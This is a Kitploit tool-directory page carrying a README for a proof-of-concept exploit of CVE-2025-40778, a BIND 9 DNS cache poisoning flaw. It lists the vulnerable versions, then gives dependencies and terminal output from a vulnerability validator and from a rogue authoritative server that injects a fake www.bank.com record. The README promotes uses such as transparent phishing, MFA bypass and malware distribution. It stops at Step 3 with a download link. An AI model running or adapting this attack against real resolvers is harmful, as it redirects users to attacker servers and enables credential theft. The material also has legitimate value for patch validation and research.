Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-40778 — Proof-of-concept demonstrating DNS cache poisoning via additional record injection in BIND 9, with tools to validate and exploit CVE-2025-40778 for authorized security testing. | Kitploit
Tools/GitHubGitHub/nehkark/cve-2025-40778
Vulnerability AnalysisExploitationPhishingWeb SecurityLearning & EducationDNS Analysis
GitHubnehkark/cve-2025-40778

CVE-2025-40778

Proof-of-concept demonstrating DNS cache poisoning via additional record injection in BIND 9, with tools to validate and exploit CVE-2025-40778 for authorized security testing.

View Repository
622411 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-40778 Proof of Concept

Educational demonstration of DNS Cache Poisoning vulnerability via Additional Records injection.

⚠️ Disclaimer

FOR EDUCATIONAL PURPOSES ONLY

This tool is provided for educational and authorized security testing purposes only. Unauthorized use of this tool against systems you do not own or have explicit permission to test is illegal and unethical.

The author assumes no liability for misuse or damage caused by this tool.

📋 Description

This PoC demonstrates how a compromised authoritative DNS server can inject poisoned records into DNS responses, potentially redirecting users to malicious servers without their knowledge.

Attack Vector:

  • Compromised authoritative nameserver injects additional DNS records
  • Poisoned records get cached by recursive resolvers
  • Users querying legitimate domains get redirected to attacker-controlled IPs
  • Enables transparent phishing attacks (correct URL, malicious server)

Possible scenarios:

  • 100% transparent phishing (correct URL)
  • Bypass anti-phishing training
  • Large-scale attacks against corporate networks
  • Persistence (lasts hours with high TTL)
  • Affects ALL applications
  • MFA bypass (via transparent proxy)
  • Malware distribution via updates
  • Long etc.

👤 Author & Contact

  • Researcher: krakhen.dev
  • GitHub: @nehkark
  • Email: [email protected]
  • ICQ: 24298753
  • Website: https://vciso.cloud

🔧 Requirements

pip install dnslib
pip install dnspython
pip install scapy

Technical Summary CVE-2025-40778

🔧 Check DNS Version

Vulnerable versions of Bind9

  • 9.11.0 – 9.16.50
  • 9.18.0 – 9.18.39
  • 9.20.0 – 9.20.13
  • 9.21.0 – 9.21.12
(venv) krakhen@poc-linux:~/CVE-2025-40778$ dig @200.0.0.X version.bind chaos txt

; <<>> DiG 9.18.39-0ubuntu0.22.04.2-Ubuntu <<>> @200.0.0.X version.bind chaos txt
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 29000
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 76413e932ad7f2957d8d2a5d6904bec838947bd91c40da8e (good)
;; QUESTION SECTION:
;version.bind.			CH	TXT

;; ANSWER SECTION:
version.bind.		0	CH	TXT	"9.11.4-P2-RedHat-9.11.4-26.P2.el7_9.16"

;; AUTHORITY SECTION:
version.bind.		0	CH	NS	version.bind.

;; Query time: 14 msec
;; SERVER: 200.0.0.X#53(200.0.0.X) (UDP)
;; WHEN: Fri Oct 31 10:51:04 -03 2025
;; MSG SIZE  rcvd: 134

🔧 Check the vulnerability in the DNS server (BIND9)

This tool detects whether it is possible to exploit the vulnerability CVE-2025-40778

============================================================
  CVE-2025-40778 - Forwarder Configuration Validator
============================================================

Enter DNS server IP [127.0.0.1]: 200.0.0.X
Enter domain to query [www.test.local]: www.company.com

============================================================
  CVE-2025-40778 VALIDATION - Forwarder Configuration
============================================================
  DNS Server: 200.0.0.X
  Domain:     www.company.com
============================================================

[1/3] Resolution Test for www.company.com
------------------------------------------------------------
    [✓] www.company.com → 201.0.0.X
    → Forwarder ACTIVE for www.company.com

[2/3] Additional Records Test (Poison Detection)
------------------------------------------------------------
    Answers:    2 records
    Authority:  1 records
    Additional: 2 records

    ANSWER SECTION:
    → www.company.com. 300 IN CNAME www.holding.com.
    → www.holding.com. 300 IN A 201.0.0.X

    ADDITIONAL SECTION:
    → [!] POISON?: ns.company.com. 300 IN A 200.0.0.X
    → [!] POISON?: ns2.company.com. 300 IN A 200.0.1.X

    → [!!!] MULTIPLE ANSWERS - Possible poisoning detected

[3/3] Forwarder Latency Test
------------------------------------------------------------
    Query 1: 5.63ms
    Query 2: 7.46ms
    Query 3: 6.04ms
    Query 4: 5.04ms
    Query 5: 5.69ms

    Average: 5.97ms
    → [✓] Forwarder working correctly

============================================================
  CONFIGURATION VALIDATED
============================================================

🔧 Step 1: Activate Vulnerability CVE-2025-40778

Description: In this step, you launch the malicious authoritative DNS server that simulates a compromised nameserver. The server listens on a specific IP and port (127.0.0.2:5301), ready to inject poisoned DNS records into responses. When configured, it will respond to legitimate queries for www.test.local with the correct IP address, but simultaneously inject a malicious record for www.bank.com pointing to an attacker-controlled IP. This dual-response behavior is the core of the cache poisoning attack - the vulnerable DNS resolver will cache both the legitimate answer and the poisoned record, even though only one domain was requested.

(venv) krakhen@poc-linux:~CVE-2025-40778$ python3 auth_poison.py 
============================================================
  CVE-2025-40778 PoC - poc-linux | krakhen.dev
============================================================
[*] Listening: 127.0.0.2:5301
[*] Legit:   www.test.local. → 192.168.0.136
[*] Poison:  www.bank.com. → 192.168.0.100

[✓] Running. Ctrl+C to stop.

2025-10-31 10:32:56 [DNSHandler:PoisonResolver] Request: [127.0.0.1:35319] (udp) / 'www.test.local.' (A)
[→] Query: www.test.local.
[✓] Legit: www.test.local. → 192.168.0.136
[!] POISON: www.bank.com. → 192.168.0.100
2025-10-31 10:32:56 [DNSHandler:PoisonResolver] Reply: [127.0.0.1:35319] (udp) / 'www.test.local.' (A) / RRs: A,A

🔧 Step 2: Check Compromise CVE-2025-40778

Description: Here you perform a standard DNS query through your local resolver (BIND) to verify the infrastructure is working correctly. The query for www.test.local should return the legitimate IP address (192.168.0.136) as expected. At this point, the response appears normal to the end user - there's no visible indication of compromise. However, behind the scenes, the vulnerable DNS resolver has already cached both records: the legitimate one you requested AND the poisoned record for www.bank.com that was injected in the additional section of the response. This step confirms your DNS resolver successfully communicated with the malicious authoritative server and processed its response.

(venv) krakhen@poc-linux:~/invest/CVE-2025-40778$ dig @127.0.0.1 www.test.local A

; <<>> DiG 9.18.39-0ubuntu0.22.04.2-Ubuntu <<>> @127.0.0.1 www.test.local A
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 57107
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
; COOKIE: 169780f6ce6781fb010000006904bd5997b99a385f650fa3 (good)
;; QUESTION SECTION:
;www.test.local.			IN	A

;; ANSWER SECTION:
www.test.local.		120	IN	A	192.168.0.136

;; Query time: 1 msec
;; SERVER: 127.0.0.1#53(127.0.0.1) (UDP)
;; WHEN: Fri Oct 31 10:44:57 -03 2025
;; MSG SIZE  rcvd: 87

🔧 Step 3: Poison DNS - CVE-2025-40778 Active

Download Tool